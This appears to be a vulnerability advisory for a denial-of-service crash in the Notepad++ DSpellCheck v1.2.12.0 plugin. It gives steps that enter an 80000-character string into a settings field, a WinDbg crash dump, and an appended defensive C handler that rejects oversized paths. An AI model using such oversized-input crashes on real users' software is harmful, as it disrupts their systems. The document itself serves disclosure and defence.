# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin [DOS]
# Exploit Author: sajith
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/
# Vulnerable plugin version: DSpellCheck v1.2.12.0
# Tested in: Windows XP SP3 EN, Notepad++ 6.5.4

POC:
1) Install Notepad++.
2) Open the Plugins menu, select DSpellCheck and click Settings.
3) In the "Hunspell dictionaries path" field enter a large string, say 80000 A's, and click "Apply".

##########################################################
(cf8.4f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00690044 ebx=00000000 ecx=00000294 edx=01f56070 esi=01f56060 edi=00000000
eip=7c919fca esp=01d0ed74 ebp=01d0ede8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlpWaitForCriticalSection+0x5b:
7c919fca ff4010 inc dword ptr [eax+10h] ds:0023:00690054=bc5d0050
####################################################
FAULTING_IP:
ntdll!RtlpWaitForCriticalSection+5b
7c919fca ff4010 inc dword ptr [eax+10h]

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 7c919fca (ntdll!RtlpWaitForCriticalSection+0x0000005b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00690054
Attempt to write to address 00690054

FAULTING_THREAD: 000004f8

PROCESS_NAME: notepad++.exe

FAULTING_MODULE: 7c900000 ntdll

DEBUG_FLR_IMAGE_TIMESTAMP: 52c4419f

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1: 00000001

EXCEPTION_PARAMETER2: 00690054

WRITE_ADDRESS: 00690054

FOLLOWUP_IP:
DSpellCheck!setInfo+577f5
012f4cb5 59 pop ecx

CRITICAL_SECTION: 00f56060 -- (!cs -s 00f56060)

BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_WRONG_SYMBOLS

PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE

DEFAULT_BUCKET_ID: STRING_DEREFERENCE

LAST_CONTROL_TRANSFER: from 7c901046 to 7c919fca

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
01d0ede8 7c901046 00f56060 012feb19 01f56060 ntdll!RtlpWaitForCriticalSection+0x5b
01d0ee00 012f4cb5 00000013 012f8787 00000003 ntdll!RtlEnterCriticalSection+0x46
01d0ee48 012f15f0 908eab95 01654af8 00000000 DSpellCheck!setInfo+0x577f5
01d0ee7c 012f166b 01f54058 0130e360 00000040 DSpellCheck!setInfo+0x54130
01d0ee8c 012aecaa 01f54058 0130e360 01f56056 DSpellCheck!setInfo+0x541ab
01d0ee90 01f54058 0130e360 01f56056 00000000 DSpellCheck!setInfo+0x117ea
01d0ee94 0130e360 01f56056 00000000 016549a8 0x1f54058
01d0ee98 01f56056 00000000 016549a8 00000000 DSpellCheck!setInfo+0x70ea0
01d0ee9c 00000000 016549a8 00000000 00000000 0x1f56056

SYMBOL_STACK_INDEX: 2

SYMBOL_NAME: DSpellCheck!setInfo+577f5

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: DSpellCheck

IMAGE_NAME: DSpellCheck.dll

STACK_COMMAND: ~4s ; kb

BUCKET_ID: WRONG_SYMBOLS

FAILURE_BUCKET_ID: STRING_DEREFERENCE_c0000005_DSpellCheck.dll!setInfo

Followup: MachineOwner
####################################################
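Added example, not part of the advisory and not DSpellCheck's own code: a hypothetical C settings handler that refuses an oversized "dictionaries path" value instead of copying it into a fixed MAX_PATH buffer, exercised with the advisory's 80000-character input. The advisory does not establish the plugin's actual root cause, so the fixed-size record and the function names here are assumptions.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Windows' MAX_PATH (260), defined here so the example builds without <windows.h>. */
#define MAX_PATH 260

/* Hypothetical fixed-size settings record of the kind a plugin's dialog writes into. */
typedef struct {
    char dictionaries_path[MAX_PATH];
} spellcheck_settings;

/* Stores a user-supplied path only if it fits the buffer. Returns 0 on success,
 * -1 on rejection; on rejection the previous value is left untouched, so a bad
 * "Apply" can never overrun the record or leave it half-written. */
int set_dictionaries_path(spellcheck_settings *s, const char *value, size_t len)
{
    if (s == NULL || value == NULL)
        return -1;
    if (len == 0 || len >= MAX_PATH)      /* must leave room for the NUL */
        return -1;
    if (memchr(value, '\0', len) != NULL) /* reported length and C string must agree */
        return -1;
    memcpy(s->dictionaries_path, value, len);
    s->dictionaries_path[len] = '\0';
    return 0;
}

/* Feeds the advisory's input (80000 'A's, constructed here) to the setter.
 * Returns 1 if the value is refused and the old setting survives, 0 otherwise. */
int reproduce_advisory_input(void)
{
    spellcheck_settings s;
    const size_t n = 80000;
    char *big = malloc(n + 1);
    int ok;
    if (big == NULL)
        return 0;
    memset(big, 'A', n);
    big[n] = '\0';
    strcpy(s.dictionaries_path, "C:\\dict");       /* previously applied value */
    ok = set_dictionaries_path(&s, big, n) == -1 &&
         strcmp(s.dictionaries_path, "C:\\dict") == 0;
    free(big);
    return ok;
}

int main(void) { return reproduce_advisory_input() ? 0 : 1; }
```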